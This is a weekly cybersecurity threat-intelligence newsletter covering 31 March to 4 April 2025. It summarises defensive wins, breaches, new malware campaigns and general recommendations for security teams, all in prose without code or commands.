HomeSecurity ResourcesThreat BriefingsVerSprite Weekly Threat Intelligence

VerSprite Weekly Threat Intelligence

Date Range: 31 March 2025 – 04 April 2025

Issue: 8th Edition

Security Triumphs of the Week

This week highlighted major strides in cybersecurity defense and enforcement. CISA released an in-depth analysis of RESURGE malware, offering valuable IOCs and detection tools. Microsoft alerted organizations to a tax-themed phishing campaign using QR codes, reinforcing awareness during a high-risk period. Europol successfully dismantled the ‘Kidflix’ child abuse platform, showcasing effective global law enforcement collaboration. Google expanded easy-to-use end-to-end encryption for Gmail business users, strengthening communication security. Microsoft applied AI to uncover vulnerabilities in core bootloaders, advancing proactive threat discovery. The DoJ’s $8M seizure from a crypto scam marked a key victory against financial cybercrime. Together, these developments reflect growing momentum in proactive defense, innovation, and international cooperation.

CISA Releases Analysis on RESURGE Malware
CISA has published a detailed Malware Analysis Report on RESURGE, a threat linked to vulnerabilities in Ivanti Connect Secure. The report includes behavioral details, IOCs, and YARA rules to help defenders detect and block the malware. By making this intelligence public, CISA enables faster response from network defenders. This proactive move supports broader threat awareness across government and private sectors.
Read full article: CISA

Microsoft Detects Tax-Themed QR Code Phishing Campaign
Microsoft has warned about a phishing campaign using QR codes embedded in PDF attachments, themed around tax filings. The technique is designed to bypass traditional email filters and steal credentials. Microsoft’s early detection allows organizations to update filters and educate users ahead of tax season. The alert helps reduce risks during a time of heightened phishing activity.
Read full article: Thehackernews

Europol Shuts Down ‘Kidflix’ Child Abuse Platform
Europol and international police forces have dismantled the ‘Kidflix’ platform, which hosted and distributed child exploitation content. The operation led to multiple arrests and infrastructure seizures across various countries. Authorities used advanced digital forensics and intelligence sharing to coordinate the takedown. This marks a major win against dark web child abuse networks.
Read full article: Reuters

Google Enables End-to-End Encryption for Gmail Business Users
Google has expanded end-to-end encryption (E2EE) for all Gmail Workspace business users. Admins can now enable encryption with minimal setup, securing email content from unauthorized access. This move enhances regulatory compliance and protects sensitive communications. It reflects Google’s commitment to making strong encryption more accessible across enterprises.
Read full article: Google

Microsoft Uses AI to Discover Bootloader Vulnerabilities
Microsoft has leveraged AI tools to identify critical vulnerabilities in widely used bootloaders such as GRUB2, U-Boot, and Barebox. These findings were responsibly disclosed to vendors for patching. The use of AI in this context shows its growing role in vulnerability discovery and software hardening. This initiative enhances firmware-level security across devices.
Read full article: BleepingComputer

DoJ Seizes $8M from ‘Pig Butchering’ Crypto Scam
The U.S. Department of Justice has seized over $8 million from a crypto scam known as a “Pig Butchering” scheme. These scams manipulate victims into fake investments over time using social engineering. The funds will aid in restitution and ongoing investigations. The seizure demonstrates growing success in tracing and disrupting financial cybercrime.
Read full article: DarkReading

Security Setbacks of the Week

This week’s threat landscape reflects an alarming rise in supply chain abuse, state-sponsored espionage, and ransomware activity. North Korea’s Lazarus Group escalated its npm-based malware operations, while the Port of Seattle suffered a data breach impacting 90,000+ individuals. Ukrainian military personnel faced targeted phishing attacks tied to foreign intelligence objectives, and threat actors abused DLL sideloading in signed software to bypass defenses. Additionally, espionage campaigns like HollowQuill are leveraging sophisticated malware delivery via PDFs, signaling continued risk to both government and enterprise sectors.

Lazarus Expands Malicious NPM Campaign
North Korea’s Lazarus Group has broadened its malicious activity in the software supply chain by publishing 11 new npm packages containing malware loaders. These packages abuse postinstall scripts to fetch malicious payloads from Bitbucket, expanding previous campaigns and increasing risk to developers using open-source components.
Read full article: Socket.dev

Port of Seattle Ransomware Attack
A ransomware attack targeted the Port of Seattle, compromising personal data of over 90,000 individuals. Threat actors reportedly exfiltrated sensitive information, including social security numbers and health records, impacting employees, contractors, and business partners.
Read full article: Daily Security Review

CERT-UA Reports Attacks on Ukrainian Military Personnel
Ukraine’s CERT-UA has revealed a new wave of cyberattacks targeting its armed forces. The campaign involves phishing lures leading to remote access malware deployment and aims to exfiltrate battlefield-relevant data—likely part of larger state-sponsored espionage operations.
Read full article: The Hacker News

Compromised DLLs in Signed Software
Ontinue researchers discovered that threat actors are increasingly hijacking DLLs in signed software using sideloading techniques. These compromised libraries are deployed to bypass detection and gain persistence in enterprise environments—highlighting supply chain blind spots in trusted software.
Read full article: Ontinue

Operation HollowQuill Targets Russian R&D
The HollowQuill campaign targeted research and development organizations in Russia via spear-phishing emails with malicious PDF attachments. Once opened, these files drop Cobalt Strike payloads to enable lateral movement and espionage-focused operations.
Read full article: Seqrite

The New Emerging Threats

This week highlights a wave of stealthy and socially engineered cyber threats. Hackers are distributing ransomware through a fake CAPTCHA scam called ClickFix, tricking users into launching malicious installers. Russian APTs are exploiting CVE-2025-26633 to deploy stealth malware like SilentPrism and DarkWisp via the EvilTwin toolset. Attackers are also using fake Zoom installers to spread BlackSuit ransomware, targeting remote users. The newly observed KoiLoader uses PowerShell to deliver payloads while evading detection. Meanwhile, Triton RAT leverages Telegram as a covert C2 channel to control infected systems. These threats reinforce the need for stronger email defenses, script control, and user awareness.

Hackers Exploit ClickFix CAPTCHA Scam to Spread Ransomware
A new ransomware campaign is using a fake CAPTCHA service called ClickFix to trick users into launching malware. Victims encounter a CAPTCHA pop-up during web activity, which upon interaction, downloads a malicious installer. The ransomware is executed silently in the background, encrypting user files and demanding cryptocurrency payment. The tactic mimics legitimate CAPTCHA behavior, making it harder for users to detect the scam. Distribution channels include phishing emails and compromised websites. Organizations are urged to monitor for suspicious download activity and reinforce phishing awareness training.
Read full article: NPAV

Russian Hackers Exploit CVE-2025-26633 to Deploy SilentPrism and DarkWisp
Russian state-backed threat actors are exploiting a critical Windows vulnerability, CVE-2025-26633, using a malicious MSC file delivery method dubbed EvilTwin. This exploit enables attackers to remotely deploy SilentPrism, a stealth reconnaissance tool, and DarkWisp, a backdoor used for data theft and persistence. The malware operates with high obfuscation, making detection difficult in enterprise networks. Targets include government bodies, infrastructure providers, and sensitive corporate systems. Security experts recommend urgent patching, enhanced logging, and vigilance around unusual MSC activity.
Read full article: Thehackernews

Bogus Zoom Installer Delivers BlackSuit Ransomware
A new attack campaign uses fake Zoom installers to deliver BlackSuit ransomware, targeting users seeking video conferencing software. Victims are directed to spoofed Zoom download pages via phishing emails and malvertising. Once downloaded, the installer triggers the ransomware, encrypting critical files and disrupting business operations. BlackSuit is particularly dangerous due to its fast encryption, multithreading, and ability to delete backups. This campaign highlights the risks of downloading software from unofficial sources.
Read full article: Thedfirreport

KoiLoader Leverages PowerShell to Deliver Malicious Payloads
KoiLoader is a newly observed malware loader that uses PowerShell scripts to stealthily deploy follow-up payloads such as stealers and RATs. It spreads through phishing emails containing malicious attachments or links to compromised sites. Once active, it establishes persistence using scheduled tasks and leverages built-in Windows tools for lateral movement. KoiLoader’s modular structure allows attackers to tailor payloads based on victim profile or network access. Its use of legitimate tools complicates detection, emphasizing the need for robust PowerShell logging and behavioral analysis tools.
Read full article: Cyberpress

Triton RAT Uses Telegram for Covert Remote Access
The newly discovered Triton RAT is using Telegram as a Command-and-Control (C2) channel, enabling attackers to remotely access and control infected systems. Delivered via phishing campaigns, Triton allows threat actors to exfiltrate data, execute system commands, and log keystrokes. By using Telegram’s API, the malware hides within normal encrypted traffic, making network-based detection more difficult. It also includes auto-update and persistence mechanisms, increasing its threat potential. Experts recommend monitoring for unauthorized Telegram traffic and blocking suspicious endpoints at the firewall level.
Read full article: Gbhackers

In-Depth Expert CTI Analysis

The Summary

This week underscored the duality of progress and persistent threats within the cyber domain. While law enforcement operations and AI-driven vulnerability discovery mark meaningful advancements, adversaries continue to evolve tactics across social engineering, supply chain compromise, and stealth malware deployment. State-backed actors remain aggressively active, exploiting geopolitical tensions, seasonal themes, and software trust chains to conduct espionage, disrupt services, and steal data. Enterprise defenders must now balance proactive innovation with deep visibility into shadowed attack vectors.

Proactive Defense and Strategic Foresight

A number of developments stood out this week as proactive defenses gained traction:

CISA’s RESURGE Malware Report offered detailed IOCs, behavioral analysis, and YARA rules, arming defenders with actionable detection capabilities for Ivanti-linked exploitation.

Microsoft leveraged AI to uncover critical bootloader flaws in GRUB2, U-Boot, and Barebox, showcasing the growing utility of ML-driven static analysis in vulnerability research.

DoJ’s $8M crypto scam seizure shows progress in disrupting large-scale fraud campaigns and reallocating stolen assets through legal restitution pipelines.

These examples highlight the importance of scalable, intelligence-led security approaches and public-private collaboration in modern cyber defense.

Evolving Ransomware and Malware Tactics

Threat actors are innovating across delivery methods, evasion, and payload deployment:

Fake CAPTCHA scams (ClickFix) are tricking users into executing ransomware installers by mimicking familiar UI patterns.

BlackSuit ransomware is being pushed via spoofed Zoom installers, weaponizing user trust in remote work tools.

KoiLoader, a new modular malware loader, uses PowerShell for stealth payload delivery and lateral movement.

Triton RAT utilizes Telegram for encrypted C2 communication, blending in with legitimate traffic and making detection more complex.

QR code phishing campaigns bypass traditional filters, proving that even legacy attack methods can thrive when creatively retooled.

These trends reinforce the importance of behavior-based detection, PowerShell logging, and tighter controls over script execution environments.

State-Sponsored and Organized Cybercrime Convergence

State-linked APTs are becoming increasingly indistinguishable from cybercrime groups in terms of infrastructure, tooling, and targeting:

Lazarus Group expanded its malicious npm campaign, embedding malware loaders in postinstall scripts hosted on Bitbucket.

CERT-UA reported targeted phishing attacks against Ukrainian armed forces, likely aimed at battlefield data collection.

Russian APTs exploited CVE-2025-26633 using a malicious MSC-based dropper to deliver tools like SilentPrism and DarkWisp.

Europol’s takedown of ‘Kidflix’ highlighted the success of multinational digital forensics and intelligence sharing in shutting down abuse networks.

The growing operational overlap between state actors and organized cybercriminals is blurring attribution and complicating response strategies.

Operational and Tactical Implications

SOC teams and CISOs should prioritize:

Software provenance checks for all third-party and open-source components, especially those involving npm or DLL sideloading.

Email security updates, focusing on detection of QR codes, PDF lures, and spoofed software download links.

Network segmentation and egress filtering, to detect tools like Telegram being used for C2.

Enhanced phishing awareness training, especially tailored for seasonal lures like tax-related scams.

IOC ingestion pipelines that can consume shared threat intel from sources like CISA and MITRE in near-real-time.

Forward-Looking Recommendations

Adopt Threat-Informed Development: Integrate SBOMs (Software Bill of Materials) and automated dependency checks to detect supply chain risks like malicious npm packages.

Enhance Behavioral Telemetry: Invest in UEBA (User and Entity Behavior Analytics) to detect PowerShell misuse, Telegram C2, and sideloading behavior.